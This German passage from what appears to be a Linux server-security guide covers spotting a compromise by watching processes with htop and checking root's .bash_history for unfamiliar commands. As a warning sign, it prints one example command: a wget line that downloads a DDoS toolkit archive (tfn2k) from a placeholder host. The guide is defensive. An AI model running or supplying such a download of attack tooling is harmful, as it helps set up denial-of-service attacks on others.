Nützliche Tools

Eine weitere, sehr übersichtliche Möglichkeit sein System auf laufende Prozesse zu untersuchen ist die Software „htop“. Sie kann in der Regel über die gängigen Distributionen nachinstalliert werden und versteht sich als eine weitere Variante von „top“, welches in der Regel bereits installiert ist. Htop allerdings bietet deutlich mehr Möglichkeiten, sich die laufenden Prozesse im Detail anschauen zu können. Es kann nie schaden, htop auf einem Terminal laufen zu lassen um Unstimmigkeiten im System sofort zu bemerken.

Wichtig ist, nicht nur die Logfiles zu betrachten, um Auffälligkeiten festzustellen. Angreifer haben meistens das Ziel, höhere Rechte zu bekommen und versuchen daher root-User zu werden. Sofern der Angreifer dabei seine Userhistory nicht löscht, sind diese Aktivitäten dort nachvollziehbar. Diese User Aktivitäten finden sich in der Datei ./bash_history des jeweiligen Users wieder. Dort sind die Befehle verzeichnet, die ein User im Terminal ausgeführt hat. Ein Angreifer wird in jedem Fall über Terminal Befehle ein System kompromittieren. Folgendes Beispiel zeigt die History für den User root:

root@powermashine:~# less .bash_history

Sofern in der History Einträge enthalten sind, die Sie selbst nicht durchgeführt haben, sollte man sensibilisiert sein. In der Regel handelt es sich um mehr als ein oder zwei Einträge. Ein User wird kaum mit root-Rechten an einem System einen wget Befehl ausführen, um eine Datei nachzuladen und diese dann auch noch ausführen. Ein kritischer Eintrag könnte demnach so aussehen:

wget http://unbekannt.soft.xxxx.co.uk/~/xxx/tfn2k.tgz

Ein Eintrag dieser Art deutet darauf hin, dass hier über das Terminal eine Datei nachgeladen wurde. Die Befehle zum Entpacken und Installieren dürften sich im Anschluss finden. Suchmaschinen liefern zu den Dateinamen oft dazu entsprechende Ergebnisse aus, die in diesem Fall auf eine Software für DDoS-Angriffe hinweisen.